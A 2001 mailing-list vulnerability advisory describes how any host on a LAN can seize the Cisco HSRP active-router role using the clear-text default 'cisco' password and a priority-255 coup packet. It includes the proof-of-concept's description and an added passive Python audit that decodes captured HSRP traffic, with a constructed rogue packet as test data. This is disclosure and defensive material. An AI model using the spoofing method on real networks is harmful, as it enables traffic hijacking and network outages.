Cisco HSRP Weakness/DoS


Date: Thu, 3 May 2001 19:57:41 +0200
From: bashis <bash@NS.WCD.SE.>
To: [email protected]
Subject: Cisco HSRP Weakness/DoS


Hi

I was playing with Cisco's HSRP (Hot Standby Routing Protocol),
and there is a (major) weakness in that protocol that allows
any host on a LAN segment to cause an HSRP DoS.

A (very) short explanation of HSRP:
HSRP uses UDP on port 1985 to multicast address 224.0.0.2,
and the authentication is in clear text (default: cisco).

I include a small program that sends out a fake HSRP packet
when it hears a legal HSRP packet, as "proof of concept" code...

Vendor was notified about this on 14 April 2001,
and their response was to use HSRP with IPSec.
http://www.cisco.com/networkers/nw00/pres/2402.pdf

[cut from src]
/*
 * Description:
 * This code listens for any HSRP packet; when it hears one HSRP packet,
 * it captures it, modifies some of the HSRP protocol parameters, and sends out
 * a fake HSRP packet that tells the other routers that I am the active router,
 * I have the highest priority and you should be 'Standby' or silent..
 *
 * If the other active, legal router has the highest possible
 * priority (255), then they will fight.. ;-) , AND it seems
 * in my tests that the legal router who 'wishes' to be the active router
 * IS already active, so no DoS will occur. (only UDP flood from both)
 */

--
\0x62\0x61\0x73\0x68\0x69\0x73

[Attachment: hsrp-dos.tgz (gzip compressed data, last modified Thu May 3 20:02:56 2001); base64 body not reproduced here]
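The post reports that HSRP hellos are clear text on UDP/1985 to 224.0.0.2 and that any host on the segment can claim the active role with a higher priority. The passive audit below is an added example for the defender side and is not the code attached to the post: it decodes HSRPv1 packets as taken from a capture and flags the three conditions that make the described takeover possible (the default "cisco" authentication string, an HSRP Hello/Coup from a host that is not one of the configured routers, and a priority above anything the legitimate routers are configured with). The 20-byte field layout (version, opcode, state, hellotime, holdtime, priority, group, reserved, 8-byte clear-text auth, virtual IP) is the HSRPv1 format from RFC 2281; the router addresses, priorities and sample packets are constructed for this demonstration.

```python
"""Passive HSRPv1 audit over captured UDP/1985 payloads.

Added example, not the program attached to the post. The packet layout follows
RFC 2281 (HSRPv1); ROUTERS and SAMPLE_CAPTURE below are constructed test data.
"""
import struct
from dataclasses import dataclass

HSRP_PORT = 1985            # UDP port used by HSRP (from the post)
HSRP_MCAST = "224.0.0.2"    # destination multicast group (from the post)
DEFAULT_AUTH = b"cisco"     # default clear-text authentication string (from the post)

OPCODES = {0: "Hello", 1: "Coup", 2: "Resign"}
STATES = {0: "Initial", 1: "Learn", 2: "Listen", 4: "Speak", 8: "Standby", 16: "Active"}


@dataclass
class HsrpPacket:
    version: int
    opcode: int
    state: int
    hellotime: int
    holdtime: int
    priority: int
    group: int
    auth: bytes
    virtual_ip: str


def parse_hsrp(payload: bytes) -> HsrpPacket:
    """Decode an HSRPv1 UDP payload (first 20 bytes; anything after is ignored)."""
    if len(payload) < 20:
        raise ValueError("HSRPv1 payload must be at least 20 bytes")
    version, opcode, state, hellotime, holdtime, priority, group, _reserved = \
        struct.unpack("!8B", payload[:8])
    auth = payload[8:16].rstrip(b"\x00")            # clear text, NUL padded to 8 bytes
    virtual_ip = ".".join(str(b) for b in payload[16:20])
    return HsrpPacket(version, opcode, state, hellotime, holdtime,
                      priority, group, auth, virtual_ip)


def audit(packets, known_routers, expected_auth=DEFAULT_AUTH):
    """Return (src_ip, finding) tuples for one HSRP group's captured traffic.

    packets:        iterable of (src_ip, udp_payload) as a capture would yield them
    known_routers:  {src_ip: configured_priority} for the legitimate routers
    expected_auth:  the auth string the routers are configured with
    """
    findings = []
    top_legit = max(known_routers.values(), default=0)
    for src, payload in packets:
        try:
            pkt = parse_hsrp(payload)
        except ValueError as exc:
            findings.append((src, f"malformed: {exc}"))
            continue
        if pkt.auth == DEFAULT_AUTH:
            findings.append((src, "default auth string 'cisco' in use"))
        elif pkt.auth != expected_auth:
            findings.append((src, "auth string does not match configuration"))
        if src not in known_routers:
            # Any host on the segment can send these; Coup or Active state from an
            # unknown source is exactly the takeover the post describes.
            what = OPCODES.get(pkt.opcode, "?") + "/" + STATES.get(pkt.state, "?")
            findings.append((src, f"HSRP {what} from unknown host, priority {pkt.priority}"))
        elif pkt.priority != known_routers[src]:
            findings.append((src, f"priority {pkt.priority} differs from configured "
                                  f"{known_routers[src]}"))
        if pkt.priority > top_legit:
            findings.append((src, f"priority {pkt.priority} exceeds highest legitimate "
                                  f"({top_legit})"))
    return findings


def hsrp_payload(opcode, state, priority, group, auth, vip):
    """Constructed sample payload; hello/hold timers 3 s / 10 s (the RFC 2281 defaults)."""
    header = struct.pack("!8B", 0, opcode, state, 3, 10, priority, group, 0)
    return header + auth.ljust(8, b"\x00") + bytes(int(o) for o in vip.split("."))


# Constructed: two legitimate routers for group 1 sharing virtual IP 10.0.0.1.
ROUTERS = {"10.0.0.2": 110, "10.0.0.3": 100}

# Constructed capture: the routers' hellos, then a Coup from an unknown host at priority 255.
SAMPLE_CAPTURE = [
    ("10.0.0.2", hsrp_payload(0, 16, 110, 1, b"cisco", "10.0.0.1")),   # Active hello
    ("10.0.0.3", hsrp_payload(0, 8, 100, 1, b"cisco", "10.0.0.1")),    # Standby hello
    ("10.0.0.77", hsrp_payload(1, 16, 255, 1, b"cisco", "10.0.0.1")),  # rogue Coup
]

if __name__ == "__main__":
    for src, finding in audit(SAMPLE_CAPTURE, ROUTERS):
        print(f"{src:>10}  {finding}")
```

On the sample capture the audit reports the default auth string on all three senders and, for 10.0.0.77, both the Coup/Active claim from an unknown host and a priority above the configured maximum. In practice the packets would come from a packet capture filtered on UDP port 1985 to 224.0.0.2, and the `known_routers` map from the router configuration; the mitigation the vendor proposed in the post (HSRP over IPSec) removes the clear-text condition that makes the rogue packets indistinguishable on the wire.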

